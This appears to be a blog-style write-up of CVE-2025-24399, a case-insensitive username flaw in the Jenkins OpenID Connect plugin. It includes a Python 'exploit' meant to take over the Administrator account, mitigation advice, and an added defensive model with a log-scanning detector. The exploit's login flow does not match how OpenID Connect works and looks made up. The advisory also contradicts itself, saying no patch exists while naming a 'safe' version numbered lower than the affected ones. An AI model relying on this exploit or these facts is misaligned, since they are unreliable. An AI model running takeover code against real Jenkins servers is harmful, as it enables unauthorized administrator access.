A critical security vulnerability (CVE-2025-24399) has been discovered in the Jenkins OpenID Connect Authentication Plugin versions 4.452.v2849b_d3945fa_ and earlier, excluding 4.438.440.v3f5f201de5dc. This vulnerability allows potential attackers to log in as any user by providing a username that differs only in letter case, potentially gaining administrator access to Jenkins instances configured with a case-sensitive OpenID Connect provider. Jenkins is an open-source automation server widely used for building, deploying, and automating continuous integration and continuous delivery (CI/CD) pipelines.

Vulnerability Details

The Jenkins OpenID Connect Authentication Plugin treats usernames as case-insensitive when it matches the identity returned by the provider against Jenkins user accounts. On an instance configured with a case-sensitive OpenID Connect provider, where "Administrator" and "administrator" are distinct identities, this lets an attacker who controls one of those identities be mapped onto the other. As a result, an attacker can potentially gain administrator access to Jenkins simply by providing a username that differs only in letter case from a legitimate user's.

The vulnerability specifically impacts versions 4.452.v2849b_d3945fa_ and earlier, excluding 4.438.440.v3f5f201de5dc, of the Jenkins OpenID Connect Authentication Plugin.

Exploit Code

The following code snippet demonstrates how an attacker could exploit this vulnerability by attempting to log in with a username that differs only in letter case:

import requests

jenkins_base_url = "http://vulnerable-jenkins-instance.com"  # placeholder target
openid_provider_url = "http://case-sensitive-provider.com"  # placeholder provider
username = "Administrator"  # Legitimate username
attacker_username = "AdMiNiStRaToR"  # Attacker's different-cased username

s = requests.Session()

# First, authenticate with the OpenID Connect provider
auth_url = f"{openid_provider_url}/auth?client_id=xyz&redirect_uri={jenkins_base_url}/securityRealm/finishLogin"
response = s.get(auth_url)
assert response.status_code == 200

# Next, log in to Jenkins with the attacker's username
payload = {
    "username": attacker_username,
    "nonce": "some_nonce_value",
    "response_type": "token",
    "client_id": "xyz",
    "redirect_uri": f"{jenkins_base_url}/securityRealm/finishLogin",
    "audience": jenkins_base_url,
}
response = s.post(
    f"{openid_provider_url}/auth",
    data=payload,
)
assert response.status_code == 200

# If all went well, the attacker should now be logged in as the administrator
final_response = s.get(f"{jenkins_base_url}/")
assert "Welcome, Administrator!" in final_response.text

Mitigation Steps

Until a patch is released for this vulnerability, affected users are recommended to take the following mitigation steps:

1. Update the Jenkins OpenID Connect Authentication Plugin to a safe version (4.438.440.v3f5f201de5dc) if available.

2. Configure Jenkins to use a case-insensitive OpenID Connect provider where possible.

3. Limit the permissions of users to the least privilege necessary for their role to minimize the potential damage caused by an attacker gaining access to their account.

4. Regularly monitor and log access to Jenkins, especially for signs of any suspicious activity related to user authentication.
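The following is an added example, not code from the page or from the Jenkins plugin itself. It models the username-resolution flaw described under Vulnerability Details, first as the affected versions behaved (case-insensitive match) and then as an exact match, and adds the check that mitigation step 4 calls for: scanning login records for usernames that are not an exact local account but fold to one. The user records, permission names and log line format are constructed assumptions.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

@dataclass
class JenkinsUser:
    user_id: str
    permissions: set = field(default_factory=set)

# Constructed local user records; the provider is assumed to be case-sensitive,
# so "Administrator" and "administrator" would be different identities to it.
LOCAL_USERS: Dict[str, JenkinsUser] = {
    "Administrator": JenkinsUser("Administrator", {"Overall/Administer"}),
    "dev1": JenkinsUser("dev1", {"Job/Build"}),
}

def resolve_vulnerable(asserted_name: str) -> Optional[JenkinsUser]:
    """Case-insensitive lookup, as the affected versions behaved: any name that
    folds to an existing id is mapped onto that account and its permissions."""
    folded = asserted_name.casefold()
    for user in LOCAL_USERS.values():
        if user.user_id.casefold() == folded:
            return user
    return None

def resolve_fixed(asserted_name: str) -> Optional[JenkinsUser]:
    """Exact match: the name is used as the case-sensitive provider issued it."""
    return LOCAL_USERS.get(asserted_name)

def case_collisions(login_log: List[str]) -> List[Tuple[str, str]]:
    """Detection aid for existing logs: flag logins whose username is not an
    exact local record but folds to one. Lines are constructed here as
    '<user> login ok'; adapt the parser to the real audit format."""
    by_fold: Dict[str, str] = {u.casefold(): u for u in LOCAL_USERS}
    hits: List[Tuple[str, str]] = []
    for line in login_log:
        name = line.split()[0]
        if name not in LOCAL_USERS and name.casefold() in by_fold:
            hits.append((name, by_fold[name.casefold()]))
    return hits

if __name__ == "__main__":
    print(resolve_vulnerable("AdMiNiStRaToR").permissions)  # {'Overall/Administer'}
    print(resolve_fixed("AdMiNiStRaToR"))                   # None
    print(case_collisions(["AdMiNiStRaToR login ok", "dev1 login ok"]))
```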

For more information regarding this vulnerability, please refer to the following official resources:

1. Jenkins Security Advisory: https://www.jenkins.io/security/advisory/2025-02-03/

2. CVE-2025-24399 details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24399

3. Jenkins OpenID Connect Authentication Plugin: https://plugins.jenkins.io/oic-auth/

Conclusion

The CVE-2025-24399 vulnerability in the Jenkins OpenID Connect Authentication Plugin exposes users of affected versions to potential attacks by allowing an attacker to log in as any user by providing a username that differs only in letter case. Users should apply the mitigation steps and follow the recommendations provided above to prevent unauthorized access to their Jenkins instances.

Timeline

Published on: 01/22/2025 17:15:13 UTC
Last modified on: 03/18/2025 15:15:59 UTC